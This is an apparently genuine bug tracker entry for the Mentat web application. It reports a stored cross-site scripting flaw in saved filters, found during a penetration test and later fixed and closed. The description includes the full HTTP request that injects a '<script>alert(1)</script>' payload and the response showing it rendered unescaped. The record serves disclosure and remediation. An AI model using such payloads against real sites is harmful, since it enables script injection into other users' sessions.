Project

General

Profile

Actions
Copy link

Bug #7571

closed

XSS at stored filters

Added by Pavel Kácha about 2 years ago. Updated almost 2 years ago.

Status:
Closed
Priority:
High
Assignee:
Rajmund Hruška
Category:
Development - GUI
Target version:
2.9.1
Start date:
03/22/2022
Due date:
% Done:

100%

Estimated time:
To be discussed:

Description

POST /mentat/filters/60/update HTTP/1.1
Host: mentat-hub.cesnet.cz
Cookie: session=.eJxxxbbd4e651a
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 525
Origin: https://mentat-hub.cesnet.cz
Referer: https://mentat-hub.cesnet.cz/mentat/filters/60/update
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

name=egi+ftp+exclusion&description=exclude+detections+generated+by+elmo+towards+egi+ftp&type=advanced&filter=Category+IN+%5B%22Recon.Scanning%22%2C+%22a%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb%22%5D+AND+Target.IP4+IN+%5B%22193.62.192.0%2F21%22%2C+%22130.14.0.0%2F16%22%5D&categories=Recon.Scanning&ips=&enabled=True&valid_from=&valid_to=&next=https%3A%2F%2Fmentat-hub.cesnet.cz%2Fmentat%2Ffilters%2F60%2Fshow&csrf_token=IjJjNmZjZDZkY2ZhNzY0ZWQwM2MzNzQ2YzMyMTcxMzNiNWQxMjk3NTQi.Yh368w.aGotI4Oy-WR6Zwb49G_vXyY9IpQ&submit=Submit

HTTP/1.1 302 FOUND
Date: Tue, 01 Mar 2022 10:52:44 GMT
Server: Apache/2.4.38 (Debian)

GET /mentat/filters/60/show HTTP/1.1
Host: mentat-hub.cesnet.cz
Cookie: session=.eJxNxxxxbd4e651a
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://mentat-hub.cesnet.cz/mentat/filters/60/update
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2022 10:52:44 GMT
Server: Apache/2.4.38 (Debian)
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

<li class="pynspect-rule-list-item"><div class="pynspect-rule-constant pynspect-rule-constant-string">&quot;a<script>alert(1)</script>b&quot;</div>

Related issues

Related to Mentat - Bug #7584: Filters allow illegal values and fail with 500 internal server errorClosedRajmund Hruška05/10/2022

Actions
Actions
Copy link
 #1

Updated by Pavel Kácha about 2 years ago

FLAB Pentest 2022-03 no. 34

Actions
Copy link
 #2

Updated by Rajmund Hruška almost 2 years ago

  • To be discussed changed from No to Yes
Actions
Copy link
 #3

Updated by Rajmund Hruška almost 2 years ago

  • Status changed from New to Resolved
  • % Done changed from 0 to 100

The error was fixed in https://gitlab.cesnet.cz/709/mentat/pynspect/-/merge_requests/9. I raised the required pynspect version and tested the filters on mentat-alt. This issue seems to be resolved.

The other issue which I came across is #7584.

Actions
Copy link
 #4

Updated by Rajmund Hruška almost 2 years ago

  • Related to Bug #7584: Filters allow illegal values and fail with 500 internal server error added
Actions
Copy link
 #5

Updated by Rajmund Hruška almost 2 years ago

  • Status changed from Resolved to In Review
Actions
Copy link
 #6

Updated by Rajmund Hruška almost 2 years ago

  • To be discussed deleted (Yes)
Actions
Copy link
 #7

Updated by Pavel Kácha almost 2 years ago

  • Target version changed from 2.10 to 2.9.1
Actions
Copy link
 #8

Updated by Pavel Kácha almost 2 years ago

  • Status changed from In Review to Closed
Actions
Copy link

Also available in: Atom PDF